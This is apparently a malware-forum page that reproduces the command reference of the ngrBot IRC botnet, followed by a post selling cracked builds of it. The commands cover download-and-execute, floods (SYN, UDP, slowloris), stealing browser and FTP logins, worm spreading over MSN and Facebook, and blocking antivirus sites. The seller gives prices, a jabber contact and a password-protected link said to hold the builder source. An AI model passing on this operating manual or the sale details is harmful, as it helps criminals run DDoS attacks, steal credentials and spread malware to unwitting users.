A forum for reverse engineering, OS internals and malware analysis
ngrBot Commands
view sourceprint?
Note: parameters within "[" and "]" are required, and parameters within "<" and ">" are optional.
!dl [url] <md5> <-r> <-n>
The bot downloads and executes a file from the specified URL.
Parameters
url URL of the file to download and execute
md5 optional MD5 hash of the file to download for integrity check, the bot will not redownload a file with the same hash until reboot
-r Enable RusKill on downloaded file
-n Disables PDef+ on the system until reboot or until it is manually re-enabled
!up [url] [md5] <-r>
The bot updates its file, but the update does not take effect until the system is restarted.
Parameters
url URL of the file to update to
md5 MD5 hash of the update file
-r Reboot immediately
!die
The bot disconnects from the IRC server and does not reconnect until its system reboots.
!rm
The bot will remove itself from the system.
!m [state]
Enable/disable all output to IRC regarding to commands and features.
Parameters
state Enable (on) or disable (off) muting of all output to IRC
The bot displays its version, customer name, the MD5 hash of its file, and its installed filepath.
!vs [url] [state]
The bot creates a browser instance and visits the specified link.
Parameters
url URL to open
state Open in a visible (1) or invisible (0) window
!rc <-n|-g>
The bot disconnects from the IRC server and waits 15 seconds before reconnecting.
Parameters
-n Only reconnect if the bot is currently marked as "new"
-g Only reconnect if the bot did not previously succeed in determining its country using GeoIP
!j [<[rule] [options]> channel] <key>
The bot joins the specified channel. If rules are specified, the bot will only join if the rules apply to it.
Parameters
rule Optional rule for the bot to check for. Supported options are -c (country) and -v (version)
options Options for selected rule
With -c, you can put a single or multiple comma-separated country code(s)
With -v, you can put a single or multiple comma-separated version(s)
channel Channel to join
key Key of channel to join
!p [<[rule] [options]> channel]
The bot parts the specified channel.
Parameters
rule Optional rule for the bot to check for. Supported options are -c (country) and -v (version)
options Options for selected rule
With -c, you can put a single or multiple comma-separated country code(s)
With -v, you can put a single or multiple comma-separated version(s)
channel Channel to part
!s <rule>
The bot joins the channel for its country (e.g. Russian bots (RU) join #RU).
Parameters
rule Optional rule for the bot to sort by instead of country. Supported options are -o (operating system), -n (new/old), -u (admin/user), and -v (version)
!us <rule>
The bot parts the channel for its country (e.g. Russian bots (RU) part #RU).
Parameters
rule Optional rule for the bot to unsort by instead of country. Supported options are -o (operating system), -n (new/old), -u (admin/user), and -v (version)
!mod [module] [state]
Enable/disable modules that use hooks.
Note: disabling bdns will only unblock AV and other preset sites, not sites set using the !mdns command.
Parameters
module Module to change. Supported modules: msn, msnu, pdef, iegrab, ffgrab, ftpgrab, bdns, usbi
state Enable (on) or disable (off) module
!stats <-l|-s>
Retrieves statistics for spreading and/or login grabbing. If no parameters are specified, it will display both.
Parameters
-l Display login grabber stats
-s Display spreading stats
!logins <site|-c>
Retrieves all grabbed and cached logins and prints them to channel or PM. Can also be used to clear login cache.
Parameters
site Site to retrieve logins for (case insensitive, see here for the list of sites)
-c Clear login cache
!stop
bot will end all running flood tasks.
!ssyn [host] [port] [seconds]
Parameters
host Host to flood with SYN requests.
port Port to flood. If 0, the bot uses a random port
seconds Number of seconds to flood the target
!udp [host] [port] [seconds]
Parameters
host Host to flood with UDP packets
port Port to flood. If 0, the bot uses a random port
seconds Number of seconds to flood the target
!slow [host] [minutes]
Parameters
host Host to flood using slowloris
minutes Number of minutes to flood the target
!msn.int [interval]
Set the number of MSN messages in a conversation before one is changed with your spreading message. See here for more information.
Note: use '#' for a random interval between 1 and 9.
Parameters
interval Number of MSN messages before spread
!msn.set [message]
Set the message that will be used for MSN spreading. See here for more information.
Note: use '#' for a random digit and '*' for a random lowercase letter.
Parameters
message Message to spread via MSN
!http.int [interval]
Set the number of Facebook messages in a conversation before one is changed with your spreading message. See here for more information.
Note: use '#' for a random interval between 1 and 9.
Parameters
interval Number of Facebook messages before spread
!http.set [message]
Set the message that will be used for Facebook spreading. See here for more information.
Note: use '#' for a random digit and '*' for a random lowercase letter.
Parameters
message Message to spread via Facebook
-------------------------
!mdns [url|[domain1 <domain2|ip2>]|[ip1 <ip2>]]
The bot will block access to or redirect the specified domain/IP address.
Note: domain to domain, domain to IP address, and IP address to IP address redirects work. IP address to domain redirection does not yet work.
Note: it must be the exact domain, for example "example.com" will not include "www.example.com". Wildcard support will be added in an update.
Parameters
url Plaintext file with one redirect/blocking rule per line, rules are formatted in the same way as the command parameters.
domain1 Requests for this domain will be redirected to domain2 or ip2 if they are set, otherwise it is blocked
ip1 Requests for this IP address will be redirected to ip2 if it is set, otherwise it is blocked
domain2 DNS queries for domain1 will be redirected to this domain if set
ip2 DNS queries for ip1 or domain1 will be redirected to this IP address if set
I am selling ngrBot bin's for sale.
These are not code hooks, these actually have 0 bytes of code patched.
I have reversed some bots and have the ability to produce legit bin's.
NO CODE is changed or altered in the binary.
This ensures maximum compatibility.
Please do not post here asking for a test bin.
Please do not post here asking for any samples.
There have been some leaked ngrBot binaries out for reversers.
Don't contact me to help you to reverse this please.
If you have reversed this yourself, that is good, but I have fubar's permission to do this.
I stand by this bot and believe it is one of the best out there by far right now.
I don't normally sell other peoples work, but right now I could use the $.
So I will be selling a limited amount of copies.
Should any domains get reported on either bot, if you contact me I will rebuild for free if you are a customer.
The binary I offer has 3 domains optional, and a list of settings and commands that can be specified upon purchase.
Channel, pass, and sethost can be specified.
SSL and other options are available/customizable.
Also I have some of the original files included with the package.
This includes all modules. This is truly an amazing bot.
Again these have not been patched, I make these builds by re-writing the settings and correctly fix other values, so there is no need for me to touch any of the code.
Originally my patch worked just fine, without any help, when I patched 1 byte of code before.
But after verifying with aadster, fubar told me the last part to fix, so no code is patched now.
Only the encrypted settings themself are actually over-written.
If you're serious, maybe I will show you a demonstration in which I run a binary file from my vmware for you to test.
The file size is the SAME size as the leaked binary. Don't ask me where to find this, you can find it somewhere and reverse it yourself if you like.
Any sales made will forward commission to fubar, as I have his permission to sell builds for now.
Starting Price 300$ (includes unlimited domain rebuilds upon blacklisting)
LR only, after 1 or 2 customers price will go up 50$ for anyone else.
As for previous ngrBot customers you'll receive updated bins for $100 each until you've reached the full selling price, then updates will be free of charge.
I won't be selling anymore than 5 copies for now.
Like I said I'm not looking to get rich just short on $ and figure I would help some people who want to progress their activities.
Facebook spread in action:
If you would like to purchase a bin or the builder contact on jabber, xmpp: loadscc@xmpp.jp
Here's where you can get this sample first released.http://malreversed.blogspot.com/2011/09 ... ample.html
Full Builder Source Code Included !
http://www.multiupload.com/6LW9S5QI1R
password: reverser@live.com
Main reasons:yes detection on crypter only, see unpacked result, P2P worms and hmblockers magically disappears
- you stupid cracker
- you stupid cracker...
- you stupid cracker?!
